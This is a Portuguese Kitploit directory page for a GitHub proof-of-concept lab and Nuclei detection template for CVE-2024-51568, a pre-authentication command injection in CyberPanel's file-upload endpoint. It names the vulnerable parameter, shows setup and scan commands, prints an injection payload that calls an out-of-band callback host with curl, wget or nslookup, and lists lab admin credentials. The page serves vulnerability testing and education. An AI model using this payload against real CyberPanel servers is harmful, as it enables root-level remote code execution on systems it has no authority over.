Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template | Kitploit
Ferramentas/GitHubGitHub/jsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoLabs e Prática
GitHubjsnv-dev/cve-2024-51568---cyberpanel-command-injection-nuclei-template

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-51568---CyberPanel-Command-Injection-Nuclei-Template

Ver Repositório
11há 11 mesesAinda não revisado

CVE-2024-51568 - PoC de Injeção de Comandos no CyberPanel

Um ambiente de prova de conceito e template de Nuclei para testar o CVE-2024-51568, uma vulnerabilidade crítica de injeção de comandos pré-autenticação no CyberPanel.

Detalhes da Vulnerabilidade

  • CVE: CVE-2024-51568
  • Gravidade: Crítica (CVSS 9.8)
  • Tipo: Injeção de Comandos pré-autenticação
  • Endpoint: /filemanager/upload
  • Parâmetro: completePath
  • Impacto: Execução Remota de Código com privilégios de root

Início Rápido

1. Iniciar o Ambiente Vulnerável

root@kitploit:~
cd docker/
docker-compose up -d --build

2. Verificar se o CyberPanel está em Execução

root@kitploit:~
curl -I http://localhost:8090

3. Testar a Vulnerabilidade

root@kitploit:~
nuclei -t template/cve-2024-51568.yaml -u http://localhost:8090

Exemplo de Saída:

root@kitploit:~
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /root/nuclei-templates
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[CVE-2024-51568] [http] [critical] http://localhost:8090/filemanager/upload
[INF] Scan completed in 5.706766772s. 1 matches found.

Como Funciona

A Vulnerabilidade

O CyberPanel v2.3.4 contém uma falha de injeção de comandos na funcionalidade de upload de arquivos:

  1. Endpoint: POST /filemanager/upload
  2. Parâmetro: completePath em dados multipart/form-data
  3. Injeção: Comandos são executados via ProcessUtilities.outputExecutioner()
  4. Bypass: Nenhuma autenticação é necessária devido a um bypass no middleware

Template do Nuclei:

  1. Extrai o token CSRF da requisição GET inicial
  2. Envia upload de arquivo malicioso com comando injetado em completePath
  3. Usa Interactsh para detecção fora de banda (callbacks HTTP/DNS)
  4. Detecta execução bem-sucedida quando o servidor contata a URL do Interactsh

Payload de Detecção

root@kitploit:~
/dev/null; curl {{interactsh-url}} || wget {{interactsh-url}} || nslookup {{interactsh-url}}; #

Este payload garante detecção confiável em diferentes configurações de sistema.

Configuração

Acesso ao CyberPanel

  • URL: http://localhost:8090
  • Admin: admin
  • Senha: 1234567

Referências

  • Original Research
  • Metasploit Module
  • CVE Details

Aviso de Segurança

Este ambiente contém vulnerabilidades intencionais para pesquisa e educação em segurança:

  • NÃO implante em produção
  • NÃO exponha a redes públicas
  • NÃO use em sistemas que você não possui
  • USE apenas para testes de segurança autorizados

Aviso Legal

Esta prova de conceito é fornecida apenas para fins educacionais e de testes de segurança autorizados. Os usuários são responsáveis por cumprir as leis aplicáveis e obter a devida autorização antes de testar.

Baixar ferramenta